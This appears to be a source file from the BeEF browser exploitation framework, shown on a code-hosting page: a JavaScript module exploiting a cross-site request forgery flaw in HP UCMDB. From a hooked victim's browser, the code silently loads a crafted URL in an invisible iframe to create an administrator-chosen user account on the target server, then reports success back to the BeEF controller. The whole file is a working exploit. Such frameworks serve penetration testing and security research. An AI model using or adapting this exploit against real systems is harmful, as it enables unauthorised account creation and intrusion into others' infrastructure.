Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/hp_ucmdb_add_user_csrf/command.js
1154 views
1
/*
2
* Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
* Browser Exploitation Framework (BeEF) - https://beefproject.com
4
* See the file 'doc/COPYING' for copying permission
5
*/
6
7
beef.execute(function() {
8
var protocol = '<%= @protocol %>';
9
var host = '<%= @host %>';
10
var port = '<%= @port %>';
11
var usertype = '<%= @usertype %>';
12
var customerid = '<%= @customerid %>';
13
var username = '<%= @username %>';
14
var password = '<%= @password %>';
15
16
var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
17
url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
18
19
if (usertype == 'createIntegrationUser'){
20
url += '&arg3=';
21
}
22
23
var ucmdb_iframe = beef.dom.createInvisibleIframe();
24
ucmdb_iframe.setAttribute('src', url);
25
26
cleanup = function() {
27
document.body.removeChild(ucmdb_iframe);
28
}
29
setTimeout("cleanup()", 15000);
30
31
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
32
});
33
34